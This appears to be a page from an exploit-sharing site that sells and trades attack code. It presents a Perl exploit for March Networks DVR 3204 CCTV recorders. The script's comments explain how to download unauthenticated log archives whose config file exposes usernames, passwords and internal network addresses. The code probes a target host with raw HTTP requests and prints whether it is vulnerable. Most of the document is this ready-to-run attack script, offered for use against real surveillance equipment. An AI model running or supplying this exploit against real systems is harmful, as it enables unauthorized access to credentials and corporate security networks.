0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
March Networks DVR 3204 Logfile Information Disclosure Exploit
============================================================== March Networks DVR 3204 Logfile Information Disclosure Exploit ============================================================== #!/usr/bin/perl # # March Networks DVR 3204 Logfile Information Disclosure Exploit # # Since configuration of the IP address, user console and root is # carried out over the "administrator console", the vulnerability # lies within Watchdog's HTTP server application. # # Any user can obtain the log files without authentication by accessing # the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder # can then uncompress the tar file and access the config.dat to reveal # username and passwords, names of devices, and IP addresses of other # security components attached to the corporate networ # # More details: # http://www.sybsecurity.com/resources/static/ # An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf # # By Alex Hernandez ahernandez [at] sybsecurity [dot] com # # Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80 # Usage: perl -x dvr3204_exp.pl 127.0.0.1:80 # # $ perl -x dvr3204_exp.pl 10.50.10.246:80 # Trying... # # THIS HOST IS VULNERABLE!!! :-) # Check the details on w w w [dot] sybsecurity [dot] c o m # # THIS HOST IS NOT VULNERABLE :-( # Check the settings on browser... # # use Socket; if ($#ARGV<0) {die " \nMarch Networks DVR 3204 exploit\n More details: http://www.sybsecurity.com By Alex Hernandez\n ahernandez [at] sybsecurity [dot] com\n Usage: perl -x $0 www.marchnetworks.com:80 Usage: perl -x $0 127.0.0.1:80\n\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying...\n\n"; $target = inet_aton($host); $flag=0; my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n Check the details on www [dot] sybsecurity [dot] com\n";} else {print "THIS HOST IS NOT VULNERABLE :-( \n Check the settings on browser...\n";} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); } } # 0day.today [2024-12-26] #